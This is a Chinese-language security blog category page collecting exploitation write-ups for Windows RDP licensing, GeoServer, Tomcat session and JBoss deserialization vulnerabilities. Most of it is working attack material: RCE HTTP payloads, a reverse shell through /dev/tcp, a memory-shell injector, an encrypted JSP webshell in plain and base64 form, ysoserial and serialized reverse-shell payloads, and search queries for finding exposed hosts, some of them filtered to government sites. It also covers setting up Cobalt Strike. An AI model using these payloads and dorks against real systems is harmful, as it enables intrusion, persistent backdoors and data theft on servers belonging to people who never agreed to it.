Cve漏洞 on 静静的安全笔记

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞狂躁许可（MadLicense）

Thu, 15 Aug 2024 16:43:45 +0000

参考链接 Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077) Windows 远程桌面授权服务远程代码执行漏洞关于Windows远程桌面许可服务存在远程代码执行漏洞的安全公告微软高危漏洞 CVE-2024-38077 EXP CVE-2024-38077-EXP 漏洞预警 | 已复现】Windows 远程桌面授权服务远程代码执行漏洞（CVE-2024-38077）附POC

漏洞影响的产品和版本

 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 2Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 3Windows Server 2008 R2 for x64-based Systems Service Pack 1
 4Windows Server 2008 R2 for x64-based Systems Service Pack 1
 5Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 6Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 7Windows Server 2008 for x64-based Systems Service Pack 2
 8Windows Server 2008 for x64-based Systems Service Pack 2
 9Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
10Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
11Windows Server 2008 for 32-bit Systems Service Pack 2
12Windows Server 2008 for 32-bit Systems Service Pack 2
13Windows Server 2012 R2 (Server Core installation)
14Windows Server 2012 R2
15Windows Server 2012 (Server Core installation)
16Windows Server 2012
17Windows Server 2016 (Server Core installation)
18Windows Server 2016
19Windows Server 2019 (Server Core installation)
20Windows Server 2019
21Windows Server 2022, 23H2 Edition (Server Core installation)
22Windows Server 2022 (Server Core installation)
23Windows Server 2022
24Windows Server 2025 Preview

用法

靶场搭建

开一个普通的Windows Server 2012 R2 数据中心版 64位中文版服务器。

打开服务器管理器。在命令提示符（cmd）中输入 “servermanager” 命令打开 “服务器管理器”。

添加角色和功能。点击 “添加” ，然后弹出角色和功能向导。默认点击下一步到 “服务器角色” 功能。添加 “远程桌面服务”。选择后默认下一步进行安装，直到显示 “角色服务” 。在这里选择 “远程桌面授权” ，然后点击 “安装” 。安装过程可能需要等待1-2分钟。

安装完成后需要手动开启服务。在命令提示符（cmd）中输入 “services.msc” 命令，成功打开 “服务” 窗口，找到 “Remote Procedure Call (RPC) Locator” 点击开启RPC服务即可完成。

搜索语法

ZoomEye搜索

1"3d267954-eeb7-11d1-b94e-00c04fa3080d"
2"3d267954-eeb7-11d1-b94e-00c04fa3080d" + country:"CN"

Hunter搜索

1ip.ports="3389" && ip.ports="135" && icp.is_exception="true"
2ip.ports="135"&&icp.is_exception="true"&&icp.name="政府"

检测

方法一：下载深信服CVE-2024-38077漏洞扫描工具.exe，使用命令.\深信服CVE-2024-38077漏洞扫描工具.exe 49.235.229.3 检查目标是否存在该漏洞。

方法二：下载利用工具CVE-2024-38077-EXP

1python CVE-2024-38077-POC.py --target_ip 靶机IP

利用

1options:
2 -h, --help show this help message and exit
3 --target_ip TARGET_IP
4 Target IP, eg: 192.168.120.1
5 --evil_ip EVIL_IP Evil IP, eg: 192.168.120.2
6 --evil_dll_path EVIL_DLL_PATH
7 Evil dll path, eg: \smb\evil_dll.dll
8 --check_vuln_exist CHECK_VULN_EXIST
9 Check vulnerability exist before exploit

有一个公众号复现视频模糊的背景看出似乎要CS？

cobaltstrike-client的使用

CobaltStrike使用教程详解（基础）

下载CS4.8，解压密码mht。

CS需要一个CS服务器，一个控制机（攻击机），被控机（靶机）。首先在CS服务器上安装java11，然后设置权限全部可执行，设置密码启动。

1推荐使用ubuntu18运行
2sudo apt install openjdk-11-jre-headless
3sudo apt install openjdk-11-jdk
4chmod 777 teamserver
5chmod 777 TeamServerImage
6./teamserver CS服务器公网IP passwd

在控制机上cobaltstrike-client也是需要Java11才能启动。

1java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:uHook.jar -Dfile.encoding=utf-8 -jar cobaltstrike-client.jar

输入之前设置的主机ip和密码就可以，端口默认。

执行多次不成功，看报错提示似乎还需要一个dll文件。后台翻Github发现POC仅针对2025，好好好好，这么玩是吧，什么垃圾。

总结评价

没啥用了的噱头很大的鸡肋漏洞，漏洞本身价值很大，但是防守应急处置手段太过简单，没有沉没代价，只要封一个135端口就行，基本不影响业务。默认情况下，Windows服务器远程桌面服务仅支持两个并发会话，在启用RDP多并发会话支持时，需要手动安装RDL服务。不排除还有未更新的和未关闭端口的服务，总之是看谁手速快了。

我现在因为复现失败很狂躁，不愧是狂躁许可（MadLicense），真是让人狂躁。

GeoServer CVE-2024-36401 漏洞利用

Tue, 13 Aug 2024 15:02:58 +0000

搜索语法

app.name=“GeoServer” and ip.country=“CN” and icp.is_exception=“true”

版本属性

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

靶场环境

建议开一个美国区的云服务器，拉取GitHub和Vulhub方便。

1git clone https://github.com/vulhub/vulhub.git
2cd vulhub/
3cd geoserver/CVE-2024-36401/
4docker-compose up -d

访问 http://your-ip:8080/geoserver 查看到GeoServer的默认页面。

POC

GET方法的POC

1GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
2Host: your-ip:8080
3Accept-Encoding: gzip, deflate, br
4Accept: */*
5Accept-Language: en-US;q=0.9,en;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
7Connection: close
8Cache-Control: max-age=0

进入容器查看，可以看到成功创建文件。

1docker exec -it cve-2024-36401_web_1 /bin/bash
2ls /tmp

基于POST方法的POC

 1POST /geoserver/wfs HTTP/1.1
 2Host: your-ip:8080
 3Accept-Encoding: gzip, deflate, br
 4Accept: */*
 5Accept-Language: en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 356
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
18</wfs:GetPropertyValue>

只有 ows:ExceptionReport java.lang.ClassCastException: 的报错是成功执行的。

值得注意的是，typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types

DNS 反弹测试

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 358
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 5s1mc4.dnslog.cn')</wfs:valueReference>
18</wfs:GetPropertyValue>

武器化利用

反弹Shell

反弹shell在线生成器在线生成一句话反弹命令

1echo "sh -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1" |base64
2nc -lvnp 7777 # 攻击机开启监听端口

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}')</wfs:valueReference>
18</wfs:GetPropertyValue>

注意 Content-Length:357 中数字的长度要和命令的字节数等于或大于才能执行成功，越大执行越慢。

注入内存木马

使用JMG工具生成内存马，注意名写 java.lang.tes，自定义密码密钥点击生成。把输出复制到下面的POC里 str="内存马base64";的位置。

 1POST /geoserver/wfs HTTP/1.1
 2Host: 47.251.97.142:8080
 3Accept-Encoding: gzip,deflate,br
 4Accept: */*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
18var str="";
19var bt;
20try {
21 bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
22} catch (e) {
23 bt = java.util.Base64.getDecoder().decode(str);
24}
25var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
26theUnsafe.setAccessible(true);
27unsafe = theUnsafe.get(null);
28unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
29')</wfs:valueReference>
30</wfs:GetPropertyValue>

POC有问题，不成功，建议使用反弹shell后再用别的工具建立探针控制。

工具批量监测

1git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git
2cd CVE-2024-36401/
3pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
4python exploit.py -l geoserverip.txt

参考链接 https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q https://cloud.tencent.com/developer/article/2437213 https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md https://github.com/pen4uin/java-memshell-generator https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x https://github.com/RevoltSecurities/CVE-2024-36401 https://yzddmr6.com/posts/geoserver-memoryshell/ https://cn-sec.com/archives/2997415.html

CVE-2022-9484 Apache Tomcat Session 漏洞利用

Thu, 08 Aug 2024 16:13:45 +0000

配置靶场

拉取靶场环境。

1docker pull vulfocus/tomcat-cve_2020_9484
2docker run -d --name tomcat-cve_2020_9484 -p 8080:8080 vulfocus/tomcat-cve_2020_9484:latest

Docker 拉取镜像太慢换源

 1sudo mkdir -p /etc/docker
 2sudo tee /etc/docker/daemon.json <<-'EOF'
 3{
 4 "registry-mirrors": [
 5 "https://yxzrazem.mirror.aliyuncs.com",
 6 "https://registry.docker-cn.com",
 7 "https://docker.mirrors.ustc.edu.cn",
 8 "https://hub-mirror.c.163.com",
 9 "https://mirror.baidubce.com"
10 ]
11}
12EOF
13sudo systemctl daemon-reload
14sudo systemctl restart docker

https://yxzrazem.mirror.aliyuncs.com 这个镜像非常快，推荐使用。

Docker 常用命令

 1# 拉取镜像
 2docker pull tomcat:jdk8-openjdk 
 3docker pull tomcat:8.5.55-jdk8-openjdk
 4# 查看镜像
 5docker images 
 6# 进入容器, 当前目录还是在tomcat镜像生成的容器目录下，可以使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
 7docker exec -it f8ca37b5df5d /bin/bash
 8#出容器
 9ctrl+p+q
10# 使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
11# 重启容器
12docker restart 容器ID
13docker restart 31290cf1cc00
14# 停止容器
15docker stop 容器id
16docker stop 31290cf1cc00
17# 启动一个已经停止的容器实例
18docker start 容器名称 或者 容器id tomcat_contract
19docker start 31290cf1cc00
20# 删除容器,可使用 -f 参数强制删除容器
21docker rm 31290cf1cc00
22# 查看所有的容器
23docker ps -a 
24# 查看运行中的容器
25docker ps 
26# 运行镜像
27docker run -d --name tomcat_test -p 8088:8080 7254ff7719c0
28docker run -d --name tomcat_test -v /etc/localtime:/etc/localtime -p 2080:8080 tomcat:latest
29# 保存镜像成一个文件。
30docker save -o tomcat-8.5.55-jdk8-openjdk-dev-v0.1.tar tomcat-8.5.55-jdk8-openjdk-dev:v0.1
31# 从容器拷贝文件到宿主机
32docker load < hangge_server.tar
33# docker cp 容器名：容器中要拷贝的文件名及其路径 要拷贝到宿主机里面对应的路径,拷贝容器中 tomcat的conf目录 到 宿主机 的 home/tomcat 目录下
34docker cp 827e39c506b1:/usr/local/tomcat/conf /home/tomcat_contract/
35# 拷贝容器中 tomcat的webapps目录 到 宿主机 的 home/tomcat 目录下
36docker cp 827e39c506b1:/usr/local/tomcat/webapps /home/tomcat_contract/
37# 删除images, 使用 docker load 命令则可将这个镜像文件载入进来。
38docker rmi 6e07337dc2a2

Groovy 执行漏洞

测试（在Docker中）

BurpSuit 抓包，修改请求头，添加Cookie: redirect=1; JSESSIONID=../../../../../usr/local/tomcat/groovy，就能读到主目录下的文件。

靶机上tmp目录生成了rce，存在漏洞。

Payload构造（在攻击机上）

生成payload，最好在目标靶机同系统的Linux上。

下载ysoserial漏洞利用工具，如果下载失败，上官网clone项目，然后apt install maven安装包构建工具，再在ysoserial主目录下mvn clean package -DskipTests生成jar包。

使用方法

1java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session

在本机目录下生成了test.session文件。文件内容是包含"touch /tmp/2333"命令的。

使用以下命令网文tomcat服务

1curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

总结注意

Groovy示例代码和test说明了，需要目标靶机存在可以被攻击机上上传修改内容的test.seesion的文件，或者攻击机通过别的方式写入session文件，知道session可以访问的路径再请求。可用于tomcat文件上传漏洞中被限制了上传jsp后缀内容的绕过。

进阶利用

生成jsp木马，将木马文件放到可访问的目录下，冰蝎或哥斯拉链接。JSP内容如下：

1<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>

将其编码为base64，这样就没有括号双引号等干扰，也可绕过一些检测。

1PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4=

构造payload，

1java -jar ysoserial-all.jar Groovy1 "echo PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4= | base64 -d > /usr/local/tomcat/webapps/ROOT/passkeybase64d.jsp" > passkeybase64d.session

注意/usr/local/tomcat/webapps/ROOT/ 为本次演示靶机的tomcat运行目录，tomcat8080页面运行目录一般在/webapps/ROOT/下，请注意路径可访问。演示时上传成功后不会执行，存在问题。

武器化

在可以运行Java8的攻击机上运行以下命令，已经添加了代理访问Github快速。

1cd /opt && git clone https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial
2
3cd /opt/ysoserial && wget https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar -O ysoserial-master.jar
4
5cd /opt && git clone https://mirror.ghproxy.com/https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh

1vim CVE-2020-9484.sh # remote_ip="10.10.15.108" 你的攻击机公网ip # change this
2nc -nvlp 4444
3cd /tmp && python3 -m http.server 80
4./CVE-2020-9484.sh target-ip

这个利用的是上传漏洞，要有上传页面，upload.jsp。

参考链接

样例目录Session泄露

很鸡肋 </examples/servlets/servlet/SessionExample> 目录下有session会话模板，可以利用。

参考链接

https://saucer-man.com/information_security/507.html

https://blog.csdn.net/qq_48985780/article/details/121421440

Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504

Thu, 08 Aug 2024 16:13:45 +0000

jboss 代码执行 (CVE-2017-12149)

影响范围

1JBoss 5.x/6.x

漏洞原理

在/invoker/readonly路径下，攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测，导致攻击者可以执行任意代码该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，导致攻击者可以通过精心设计的序列化数据来执行任意代码

漏洞复现

启动 https://vulfocus.cn/ 靶场环境

访问 /invoker/readonly 如果返回500，说明此页面就可能存在反序列化漏洞。

直接用CVE工具利用

靶场 flag-{bmh7cbffb27-ed9a-4c74-8929-0b6df905cc8a}

反弹shell的POC

下载工具后进入目录http://scan.javasec.cn/java/JavaDeserH2HC.zip

攻击机下载执行执行生成二进制payload文件：

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

修改接收shell的IP和端口：

1java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777

不要管报错

NC开启监听：

1nc -vv -l -p 7777

向靶机发起攻击Payload：

1curl http://123.58.224.8:26968/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

反弹成功

取得flag

JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）

影响版本

 1Red Hat JBoss A-MQ 6.x版本；
 2BPM Suite (BPMS) 6.x版本；
 3BRMS 6.x版本和5.x版本；
 4Data Grid (JDG) 6.x版本；
 5Data Virtualization (JDV) 6.x版本和5.x版本；
 6Enterprise Application Platform 6.x版本，5.x版本和4.3.x版本；
 7Fuse 6.x版本；
 8Fuse Service Works (FSW) 6.x版本；
 9Operations Network (JBoss ON) 3.x版本；
10Portal 6.x版本；
11SOA Platform (SOA-P) 5.x版本；
12Web Server (JWS) 3.x版本；
13Red Hat OpenShift/xPAAS 3.x版本；
14Red Hat Subscription Asset Manager 1.3版本。

漏洞原理1

JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象，然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。

漏洞复现1

如果嫩下载JMXInvokerServlet文件就存在漏洞。

1git clone https://github.com/ianxtianxt/CVE-2015-7501/
2cd CVE-2015-7501/
3javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
4java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
5nc -vv -l -p 7777
6curl http://123.58.224.8:55153/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

_flag=flag-{bmh30a69994-5535-4de1-b53d-5c36c0d0498e}

JBoss EJBInvokerServlet 反序列化漏洞

跟CVE-2015-7501利⽤⽅法⼀样，只是路径不⼀样，这个漏洞利⽤路径是

/invoker/EJBInvokerServlet

JBossMQJMS 反序列化漏洞（CVE-2017-7504）

影响版本2

JBoss <=4.x

漏洞原理2

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞复现2

访问 /jbossmq-httpil/HTTPServerILServlet 返回This is the JBossMQ HTTP-IL，说明存在反序列化漏洞。

利用工具:JavaDeserH2HC

https://github.com/joaomatosf/JavaDeserH2HC

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机:7777
3nc -vv -l -p 7777
4curl http://123.58.224.8:47973/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

flag-{bmh93d53260-14f8-4405-91cd-f4221ef65f3f}

Jexboss 工具一键植入

1python jexboss.py -u http://123.58.224.8:47973/

特殊情况

Windows主机无法反弹shell。

参考链接

https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ

Cve漏洞 on 静静的安全笔记

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞 狂躁许可（MadLicense）

漏洞影响的产品和版本

用法

靶场搭建

搜索语法

检测

利用

cobaltstrike-client的使用

总结评价

GeoServer CVE-2024-36401 漏洞利用

搜索语法

版本属性

靶场环境

POC

GET方法的POC

基于POST方法的POC

DNS 反弹测试

武器化利用

反弹Shell

注入内存木马

工具批量监测

CVE-2022-9484 Apache Tomcat Session 漏洞利用

配置靶场

Docker 常用命令

Groovy 执行漏洞

测试（在Docker中）

Payload构造（在攻击机上）

使用方法

总结注意

进阶利用

武器化

样例目录Session泄露

Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504

jboss 代码执行 (CVE-2017-12149)

影响范围

漏洞原理

漏洞复现

直接用CVE工具利用

反弹shell的POC

JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）

影响版本

漏洞原理1

漏洞复现1

JBoss EJBInvokerServlet 反序列化漏洞

JBossMQJMS 反序列化漏洞（CVE-2017-7504）

影响版本2

漏洞原理2

漏洞复现2

利用工具:JavaDeserH2HC

Jexboss 工具一键植入

特殊情况

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞狂躁许可（MadLicense）